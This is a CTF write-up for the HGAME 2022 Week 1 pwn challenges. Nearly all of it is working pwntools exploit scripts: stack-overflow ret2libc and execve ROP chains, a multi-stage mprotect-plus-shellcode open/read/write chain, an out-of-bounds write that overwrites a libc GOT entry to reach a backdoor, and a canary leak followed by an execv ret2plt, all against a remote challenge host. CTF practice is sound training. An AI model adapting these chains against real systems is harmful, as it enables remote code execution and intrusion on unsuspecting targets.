HGAME 2022 Week1 Pwn
都是简单题，随便写写，没什么好说的。
enter_the_pwn_land
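from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # dumps every byte on the wire; lower to 'info' once the chain works

#s = process('./a')
s = remote("chuj.top", 30326)
elf = ELF('./a')
libc = ELF('./libc-2.31.so')

# `pop rdi; ret` in the (non-PIE) binary. `pop rdi` is a single byte, so
# pop_rdi_ret + 1 is a bare `ret`.
pop_rdi_ret = 0x401313

# Stage 1: fill the buffer so the program echoes our 0x20 bytes followed by
# whatever sits behind them on the stack; the script treats that as a libc pointer.
payload = b'a' * 0x20
s.sendline(payload)
s.recvuntil(b'a' * 0x20)
# recvn() blocks until all 6 bytes have arrived; recv(6) may return a short
# read on a slow link and the "leak" would then be garbage.
leak = u64(s.recvn(6).ljust(8, b'\x00'))
# 0x38f6 is the distance from the leaked value to the libc base as used by the
# author; it is specific to the shipped libc-2.31.so and must be recomputed
# for any other build.
libc.address = leak + 0x38f6
info(hex(libc.address))

# Stage 2: overflow into the saved return address and call system("/bin/sh").
# The p32(1)/p32(0x2c) pair lands between the buffer and the saved frame -
# presumably two 4-byte locals (loop index/limit?) that must hold specific
# values for the overflow to be accepted - TODO confirm in the binary.
payload = b'a' * 0x28 + p32(1) + p32(0x2c) + b'a' * 8
payload += p64(pop_rdi_ret + 1)                   # bare `ret`: keeps rsp 16-byte aligned for system()
payload += p64(pop_rdi_ret)
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(libc.sym['system'])
s.sendline(payload)
s.interactive()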
enter_the_evil_pwn_land
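from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # dumps every byte on the wire; lower to 'info' once the chain works

#s = process('./a')
s = remote('chuj.top', 38135)
elf = ELF('./a')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')

# Stage 1: same leak as in enter_the_pwn_land - the program echoes our 0x20
# bytes plus the pointer that follows them on the stack.
payload = b'a' * 0x20
s.sendline(payload)
s.recvuntil(b'a' * 0x20)
# recvn() waits for all 6 bytes; recv(6) could hand back a partial read.
leak = u64(s.recvn(6).ljust(8, b'\x00'))
libc.address = leak + 0x38f6  # offset is tied to the shipped libc-2.31.so
success(hex(libc.address))

# Gadgets inside libc; these offsets are only valid for this libc build.
pop_rax_ret = libc.address + 0x4a550
pop_rdi_ret = libc.address + 0x26b72
pop_rsi_ret = libc.address + 0x27529
pop_rdx_r12_ret = libc.address + 0x11c371
# 27 bytes into libc's syscall() wrapper is the raw `syscall` instruction
# (again: build-specific).
syscall = libc.sym['syscall'] + 27

# Stage 2: execve("/bin/sh", NULL, NULL) through a raw syscall (rax = 0x3b)
# rather than calling system(). The second p64(0) after pop_rdx_r12_ret is
# the filler for r12.
payload = b'a' * 0x38
payload += p64(pop_rax_ret) + p64(0x3b)
payload += p64(pop_rdi_ret) + p64(next(libc.search(b'/bin/sh')))
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(0) + p64(0)
payload += p64(syscall)
# Pad the input out to 0x870 bytes. Presumably the program reads a fixed-size
# block and the chain only lands when the full size is supplied - TODO confirm.
payload += b'a' * (0x870 - len(payload))
s.sendline(payload)
s.interactive()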
oldfashion_orw
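from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # dumps every byte on the wire; lower to 'info' once the chain works

#s = process('./vuln')
s = remote("chuj.top", 43823)
elf = ELF('./vuln')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')

# Gadgets and addresses inside the (non-PIE) binary.
pop_rdi_ret = 0x401443
pop_rsi_r15_ret = 0x401441
vuln_func = 0x401311          # re-entered after each stage so the overflow can be reused
bss_addr = 0x404500           # scratch area in .bss that receives the shellcode
write_plt = elf.plt['write']
write_got = elf.got['write']

# Every stage answers the "size?" prompt with a negative number. Presumably the
# bound check is signed while the read length is not - TODO confirm in the binary.
SIZE_ANSWER = b'-23333'

# --- Stage 1: leak write@got with write(1, write@got, <length = whatever rdx holds>) ---
s.sendlineafter(b"size?\n", SIZE_ANSWER)
payload = b'a' * 0x38
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_r15_ret) + p64(write_got) + p64(0)
payload += p64(write_plt)
payload += p64(vuln_func)
s.sendlineafter(b"content?\n", payload)
# The top byte of a userland libc pointer is 0x7f: read up to the first one
# and take the 6 bytes ending there.
libc_base = u64(s.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00')) - libc.sym['write']
success("libc_base:\t" + hex(libc_base))

# --- Stage 2: read(0, bss, 0x100); mprotect(page, 0x1000, RWX); jmp rax -> shellcode ---
s.sendlineafter(b"size?\n", SIZE_ANSWER)
# libc gadget offsets; only valid for the shipped libc-2.31.so.
pop_rax_ret = libc_base + 0x4a550
pop_rdx_r12_ret = libc_base + 0x11c371
jmp_rax = libc_base + 0x26e91
mprotect_addr = libc_base + libc.sym['mprotect']
read_addr = libc_base + libc.sym['read']
# Page-align with ~0xfff. The original mask 0xfff000 also dropped every bit
# above 24 and only worked because bss_addr happens to be below 16 MiB.
bss_page = bss_addr & ~0xfff

payload = b'a' * 0x38
payload += p64(pop_rdi_ret) + p64(0)                          # read(0, bss_addr, 0x100)
payload += p64(pop_rsi_r15_ret) + p64(bss_addr) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
payload += p64(read_addr)
payload += p64(pop_rdi_ret) + p64(bss_page)                   # mprotect(bss_page, 0x1000, PROT_RWX)
payload += p64(pop_rsi_r15_ret) + p64(0x1000) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(7) + p64(0)
payload += p64(mprotect_addr)
payload += p64(pop_rax_ret) + p64(bss_addr)                   # rax = shellcode, then jmp rax
payload += p64(jmp_rax)
s.sendline(payload)

# Shellcode 1: list the current directory onto the stack, print it, leak the
# buffer address, then jump back into the vulnerable function.
# The fd returned by open() is taken from rax instead of being hard-coded as 3,
# and rsi is explicitly zeroed (O_RDONLY) - the original left whatever mprotect
# had in rsi as the open flags.
shellcode_orw = '''
    push 0x2f2e          /* "./\\0" on the stack */
    mov rdi, rsp
    xor esi, esi         /* O_RDONLY */
    mov rax, 2           /* open("./", O_RDONLY) */
    syscall
    mov rdi, rax         /* the directory fd (never closed, so later opens get a higher fd) */
    mov rsi, rsp
    mov rdx, 0x100
    mov rax, 217         /* getdents64(dirfd, rsp, 0x100): listing lands on the stack */
    syscall
    mov rdi, 1
    mov rsi, rsp
    mov rdx, 0x100
    mov rax, 1           /* write(1, listing, 0x100) */
    syscall
    push rsp             /* pushes the pre-push rsp, i.e. the address of the listing buffer */
    mov rsi, rsp
    mov rdx, 8
    mov rax, 1           /* write(1, &listing, 8): leak that address */
    syscall
    push 0x401311        /* back into the vulnerable function for another round */
    ret
'''
s.sendline(asm(shellcode_orw))

# The listing contains the flag's filename; grab some of it for the log. This
# is informational only - the next stage locates the name by address, and the
# raw getdents bytes around it need not be valid UTF-8.
s.recvuntil(b"flag")
flag_name = "flag" + s.recv(20).decode(errors='replace')
success("flag:\t" + flag_name)
# The 8-byte write is the address of the listing buffer on the stack.
leak_addr = u64(s.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))
success("leak_addr:\t" + hex(leak_addr))
# 0xa3 is presumably the offset of the flag filename inside that (now stale)
# buffer; it depends on the directory contents and is the fragile part of the
# chain - TODO confirm.
flag_path = leak_addr + 0xa3

# --- Stage 3: read a second shellcode into .bss (page is already RWX) and run it ---
s.sendlineafter(b"size?\n", SIZE_ANSWER)
payload = b'a' * 0x38
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rsi_r15_ret) + p64(bss_addr) + p64(0)
payload += p64(pop_rdx_r12_ret) + p64(0x100) + p64(0)
payload += p64(read_addr)
payload += p64(pop_rax_ret) + p64(bss_addr)
payload += p64(jmp_rax)
s.sendline(payload)

# Shellcode 2: open / read / write the flag. The fd again comes from rax (the
# original hard-coded 4, relying on fd 3 still being the open directory).
shellcode_orw = f'''
    mov rdi, {flag_path}
    mov rsi, 0           /* O_RDONLY */
    mov rax, 2           /* open(flag_path, O_RDONLY) */
    syscall
    mov rdi, rax
    mov rsi, {flag_path} /* reuse the stale buffer as the read destination */
    mov rdx, 0x60
    mov rax, 0           /* read(fd, buf, 0x60) */
    syscall
    mov rdi, 1
    mov rsi, {flag_path}
    mov rdx, 0x60
    mov rax, 1           /* write(1, buf, 0x60) */
    syscall
'''
s.sendline(asm(shellcode_orw))
s.interactive()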
spfa
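from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # dumps every byte on the wire; lower to 'info' once the chain works

#s = process('./spfa')
s = remote("chuj.top", 48872)
elf = ELF('./spfa')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('./libc-2.31.so')


def oob_dist(index):
    """Run one edge-less query round and return the dist[] entry at *index*.

    The node id sent for the query is not bounds-checked by the target, so a
    negative index reads memory before the dist[] array - that is how the
    binary and libc pointers below are leaked.

    The printed number is read to the end of its line rather than as a fixed
    15 bytes, so a shorter value does not leave the next prompt's bytes behind
    and a longer one is not truncated. Assumes the value is newline-terminated
    (the next prompt starts on its own line).
    """
    s.recvuntil(b'how many nodes?\n>> ')
    s.sendline(b'2')
    s.recvuntil(b'how many edges?\n>> ')
    s.sendline(b'0')
    s.recvuntil(b'you want to start from which node?\n>> ')
    s.sendline(b'0')
    s.recvuntil(b'>> ')
    s.sendline(str(index).encode())
    s.recvuntil(b'the length of the shortest path is ')
    return int(s.recvline().strip())


# Four rounds are requested; only the three below are needed.
s.recvuntil(b'how many datas?\n>> ')
s.sendline(b'4')

# Rounds 1-2: out-of-bounds reads leak a binary pointer and a libc pointer.
# Both the indices and the subtracted offsets are specific to this build.
elf_base = oob_dist(-2275) - 0x7008
success('elf_base=>' + hex(elf_base))
libc_base = oob_dist(-2292) - 0x55410
success('libc_base=>' + hex(libc_base))

strlen_got_addr = libc_base + 0x1eb0a8   # libc-internal GOT slot for strlen (offset for this libc-2.31)
dist_addr = elf_base + 0xb720            # dist[] array inside the binary
backdoor = elf_base + 0x16A5

# Round 3: a single edge whose destination index is out of bounds, so relaxing
# it stores `backdoor` into the strlen GOT slot; the next strlen() call - on
# our 'pass' input - then lands in the backdoor. Presumably dist[start] is 0
# so the stored value is exactly the edge weight - TODO confirm.
s.recvuntil(b'how many nodes?\n>> ')
s.sendline(b'2')
s.recvuntil(b'how many edges?\n>> ')
s.sendline(b'1')
s.recvuntil(b'format\n')
s.sendline(b'1')                                                 # edge source
s.sendline(str((strlen_got_addr - dist_addr) // 8).encode())     # edge destination: GOT slot as a dist[] index (8-byte entries)
s.sendline(str(backdoor).encode())                               # edge weight = value written
s.recvuntil(b'you want to start from which node?\n>> ')
s.sendline(b'1')
s.recvuntil(b'>> ')
s.sendline(b'pass')
s.interactive()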
test_your_gdb
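from pwn import *

context(arch='amd64', os='linux', log_level='debug')  # 'debug' dumps all traffic

#io = process("./a")
io = remote("chuj.top", 50429)
elf = ELF("./a")
libc = ELF("./libc-2.31.so")

# Addresses inside the (non-PIE) binary.
execv = elf.plt['execv']
binsh = 0x408008          # "/bin/sh" in the binary - TODO confirm with elf.search(b'/bin/sh')
pop_rdi = 0x407b53
pop_rsi_r15 = 0x407b51

# The 16-byte "password" is the constant the checker expects (presumably
# recovered with gdb, hence the challenge name). After it the program prints
# data that contains the stack canary 0x18 bytes in.
io.sendafter(b'pass word\n', p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9))
# recvn() blocks until the exact count has arrived; recv() may return a short
# read and would then misalign the canary.
io.recvn(0x18)
canary = u64(io.recvn(8))
success("canary:\t" + hex(canary))
# glibc canaries on x86-64 always have a zero low byte; anything else means
# the offsets above are off for this run.
if canary & 0xff:
    log.warning("canary low byte is not 0 - leak offset is probably wrong")

# ret2plt: execv("/bin/sh", NULL). Layout: 0x18-byte buffer, canary, saved rbp,
# then the chain.
payload = b'A' * 0x18 + p64(canary) + b'a' * 8
payload += p64(pop_rdi) + p64(binsh)
payload += p64(pop_rsi_r15) + p64(0) * 2
payload += p64(execv)
io.sendline(payload)
io.recv()  # drain whatever the program prints before handing over the shell
io.interactive()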